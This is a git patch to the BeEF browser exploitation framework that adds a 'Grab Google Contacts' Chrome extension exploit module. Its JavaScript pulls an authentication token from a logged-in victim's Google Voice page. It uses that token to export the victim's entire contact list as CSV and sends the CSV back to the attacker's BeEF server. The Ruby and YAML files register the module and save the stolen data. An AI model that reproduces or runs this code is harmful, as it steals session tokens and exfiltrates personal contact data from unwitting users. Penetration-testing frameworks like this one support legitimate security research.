From 86b5d9f613dba2973680a6e5e635ccaf41902e24 Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@b87d56ec-f9c0-11de-8c8a-61c5e9addfc9>
Date: Wed, 21 Sep 2011 12:29:17 +0000
Subject: [PATCH] (Fixes issue 506): added 'grab google contacts' chrome
 extension exploit.

git-svn-id: https://beef.googlecode.com/svn/trunk@1304 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
---
 .../grab_google_contacts/command.js           | 50 +++++++++++++++++++
 .../grab_google_contacts/config.yaml          | 25 ++++++++++
 .../grab_google_contacts/module.rb            | 24 +++++++++
 3 files changed, 99 insertions(+)
 create mode 100644 modules/chrome_extensions/grab_google_contacts/command.js
 create mode 100644 modules/chrome_extensions/grab_google_contacts/config.yaml
 create mode 100644 modules/chrome_extensions/grab_google_contacts/module.rb

diff --git a/modules/chrome_extensions/grab_google_contacts/command.js b/modules/chrome_extensions/grab_google_contacts/command.js
new file mode 100644
index 000000000..974806566
--- /dev/null
+++ b/modules/chrome_extensions/grab_google_contacts/command.js
@@ -0,0 +1,50 @@
+//
+//   Copyright 2011 Wade Alcorn wade@bindshell.net
+//
+//   Licensed under the Apache License, Version 2.0 (the "License");
+//   you may not use this file except in compliance with the License.
+//   You may obtain a copy of the License at
+//
+//       http://www.apache.org/licenses/LICENSE-2.0
+//
+//   Unless required by applicable law or agreed to in writing, software
+//   distributed under the License is distributed on an "AS IS" BASIS,
+//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+//   See the License for the specific language governing permissions and
+//   limitations under the License.
+//
+beef.execute(function() {
+		var regContacts = '("AuthToken":{"Value":")(.*)("}}};)';
+		function grabCSV(token){
+			var csv = new XMLHttpRequest();
+			csv.open("GET", "https://www.google.com/voice/c/b/X/data/export?groupToExport=%5EMine&exportType=ALL&out=GMAIL_CSV&tok="+token,false);
+			csv.setRequestHeader("Content-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.3");
+			csv.send();
+			return csv.responseText
+		}
+		
+		function toolContact(v) {
+		 	var re = new RegExp(regContacts);
+		 	var m = re.exec(v);
+		 	if (m != null) {
+				tmpCSV = grabCSV(m[2])
+				params = "email=email&csv="+tmpCSV;
+                beef.net.send('<%= @command_url %>', <%= @command_id %>, tmpCSV);
+			 }
+		}
+
+		function grabContacts(){
+			var client = new XMLHttpRequest();
+			client.open("GET", "https://www.google.com/voice/c/b/X/ui/ContactManager" ,false);
+			client.setRequestHeader("Content-Charset", "ISO-8859-1,utf-8;q=0.7,*;q=0.3");
+			client.send();
+			if(client.status != 200){ // if the victim is not authenticated in Google, a 403 Forbidden error is received.
+			    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'The victim is not logged in Google.');
+			}else{ //proceed
+			    toolContact(client.responseText);
+			}
+		}
+
+		grabContacts();
+});
+
diff --git a/modules/chrome_extensions/grab_google_contacts/config.yaml b/modules/chrome_extensions/grab_google_contacts/config.yaml
new file mode 100644
index 000000000..aa19b4deb
--- /dev/null
+++ b/modules/chrome_extensions/grab_google_contacts/config.yaml
@@ -0,0 +1,25 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+beef:
+    module:
+        grab_google_contacts:
+            enable: true
+            category: "Chrome Extensions"
+            name: "Grab Google Contacts"
+            description: "Attempt to grab the contacts of the currently logged in Google account, exploiting the export to CSV feature."
+            authors: ["Kos", "antisnatchor"]
+            target:
+                working: ["C"]
diff --git a/modules/chrome_extensions/grab_google_contacts/module.rb b/modules/chrome_extensions/grab_google_contacts/module.rb
new file mode 100644
index 000000000..5a9e13a73
--- /dev/null
+++ b/modules/chrome_extensions/grab_google_contacts/module.rb
@@ -0,0 +1,24 @@
+#
+#   Copyright 2011 Wade Alcorn wade@bindshell.net
+#
+#   Licensed under the Apache License, Version 2.0 (the "License");
+#   you may not use this file except in compliance with the License.
+#   You may obtain a copy of the License at
+#
+#       http://www.apache.org/licenses/LICENSE-2.0
+#
+#   Unless required by applicable law or agreed to in writing, software
+#   distributed under the License is distributed on an "AS IS" BASIS,
+#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+#   See the License for the specific language governing permissions and
+#   limitations under the License.
+#
+class Grab_google_contacts < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Return'] = @datastore['return']
+    save content
+  end
+  
+end